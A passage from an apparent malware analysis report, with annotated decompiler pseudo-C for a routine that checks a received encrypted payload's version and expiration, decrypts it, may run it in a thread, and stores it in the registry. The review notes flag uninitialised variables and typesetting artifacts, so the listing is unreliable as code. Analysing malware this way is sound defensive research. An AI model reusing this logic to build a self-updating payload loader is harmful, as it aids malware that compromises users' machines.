/*
 * Annotated decompiler output (pseudo-C, not compilable as written): validates
 * a received payload, optionally runs it in a thread, and, when accepted,
 * installs it as the current payload.
 *
 * a1      - payload_check structure for the received payload.
 * control - when non-zero, enables the copy / decrypt / spawn-thread branch,
 *           which additionally requires bit 4 of the header flags word.
 *
 * The whole body runs between EnterCriticalSection and LeaveCriticalSection.
 * A payload is rejected (freed, nothing installed) when any of these holds:
 *   - check_payload_and_extract_header() fails;
 *   - the received version, compared on its low 31 bits, is not strictly
 *     greater than the value returned by get_payload_version();
 *   - global_time_variable + get_total_time_elapsed() has reached the
 *     expiration date read from the header.
 *
 * NOTE(review): v5, v6, v7, v8 and v11 are used without any assignment in this
 * listing. They presumably alias v2 / v9 (decompiler register artifacts);
 * confirm against the disassembly before relying on them.
 */
void iterative_payload_decrypt(payload_check *a1, int control) {
  payload_check *v2; 
  int expiration_date; 
  int current_version; 
  payload_check *v5; 
  payload_check *v6; 
  payload_check *v7; 
  int v8; 
  payload_check *v9; 
  int v10; 
  int v11; 
  payload_check *v12; 
  unsigned int v13; /* header field at offset 8; meaning not shown here */
  int v14; /* header field at offset 12; bits 1, 2 and 4 are tested below */
  int received_version; 
  char *v16; 
  int v17; 
  int v18; 
  char v19; 
  int v20; 

  v16 = &v19;
  v2 = a1;
  EnterCriticalSection(...);
  v20 = 0;
  /*
   * Validation gate. The comma expression only runs when the header check
   * succeeded; it reads the header fields at offsets 0, 4, 8 and 12 and then
   * applies the version comparison. The last operand is the expiration test.
   * NOTE(review): the goto target below looks like a typesetting artifact of
   * the label FREE MEMORY_and_EXIT defined further down - confirm.
   */
  if (! check_payload_and_extract_header(v2)
      || (current_version  = get_payload_version(),
          received_version = extract_field_from_decrypted_header(v2, 0),
          expiration_date  = extract_field_from_decrypted_header(v5, 4),
          v13 = extract_field_from_decrypted_header(v6, 8),
          v14 = extract_field_from_decrypted_header(v7, 12),
         (received_version & 0x7FFFFFFFu) <= (current_version & 0x7FFFFFFFu))
      || global_time_variable + get_total_time_elapsed() >= (unsigned
         int)expiration_date )
         goto @bfseries$FREE MEMORY and EXIT#;
  /* Parses as control && (v14 & 4): & binds tighter than &&. */
  if (control && v14 & 4 )
  {
      /* Work on a copy, so the original structure is left for the code below. */
      v9 = copy_payload_struc(v2);
      v12 = v9;
      /*
       * Keep decrypting while bit 2 of the copy's flags word is set. Each pass
       * also needs bit 1 set and a successful further_decrypt_payload();
       * otherwise the copy is freed at LABEL_9 and no thread is spawned.
       */
      while ((extract_field_from_decrypted_header(v9, 12) & 2) )
      {
          if (!(extract_field_from_decrypted_header(v9, 12) & 1) ||    
              ! further_decrypt_payload(v11, v9) )
              goto LABEL_9;
      }
      /*
       * NOTE(review): the four zero stores below are presumably stack-slot
       * artifacts of argument setup. As written, received_version is cleared
       * here and later copied into variable_payload_version - confirm.
       */
      v18 = 0;
      v17 = 0;
      v16 = 0;
      received_version = 0;
      /* Arguments are derived from the copy: size - 576 and decrypted_payload + 64. */
      spawn_payload_thread((void *)(v9->size - 576), 1, (const void
*)                           (v9->decrypted_payload + 64), 0, 0, 0, 0);
LABEL_9:
      free_payload_check_struct(&v12);
  }
  v10 = v13;
  /* v13 is unsigned, so v13 <= 0 is the same test as v13 == 0. */
  if (!(v14 & 1) || v13 <= 0 ) {
      /*
       * NOTE(review): (v14 & 2) is 0 or 2 and !v13 is 0 or 1, so the bitwise &
       * as printed is always 0 and this branch is never taken. The binary
       * presumably uses a logical AND here - confirm against the disassembly.
       */
      if (( v14 & 2 )  & !v13) {
          dword_9BBD30 = 0;
          variable_payload_version = received_version;
          clear_registry_value(4u, off_9B8DBE, 4);
          clear_registry_value(4u, off_9B9076, 5);
          variable_payload_check_struct = 0;
          store_encrypted_payload_in_registry_if_payload();
    }
    goto FREE MEMORY_and_EXIT;
  }
  /* Final decryption pass on the original structure; failure discards it. */
  if (!further_decrypt_payload(v8, v2) )  {
FREE MEMORY_and_EXIT:
      free_payload_check_struct(&a1);
      goto EXIT;
  }
  /*
   * Accepted payload: release the decrypted buffer, record v13 and the
   * version, clear two registry values, free the structure referenced through
   * off_9B9844, and keep v2 as the new variable_payload_check_struct.
   * NOTE(review): this call passes off_9B9844 directly, while the other calls
   * pass the address of a pointer variable - confirm the calling convention.
   */
  call_GlobalFree((HGLOBAL)v2->decrypted_payload);
  v2->decrypted_payload = 0;
  dword_9BBD30 = v10;
  variable_payload_version = received_version;
  clear_registry_value(4u, off_9B8DBE, 4);
  clear_registry_value(4u, off_9B9076, 5);
  free_payload_check_struct((void *)off_9B9844);
  variable_payload_check_struct = (int)v2;
  /* a1 is cleared first, presumably so the free below leaves the retained struct alone. */
  a1 = 0;
  store_encrypted_payload_in_registry_if_payload();
  free_payload_check_struct(&a1);
EXIT:
  LeaveCriticalSection(...);
}

SOURCE LISTING 19: Iterative payload decryption



 


 







Acknowledgements

  This material is based upon work supported through the U.S. Army Research Office under the Cyber-TA Research Grant No. W911NF-06-1- 0316 and by the National Science Foundation, Grant No. CNS-07-16 612. The views expressed in this document are those of the authors and do not necessarily represent the official position of the sponsors.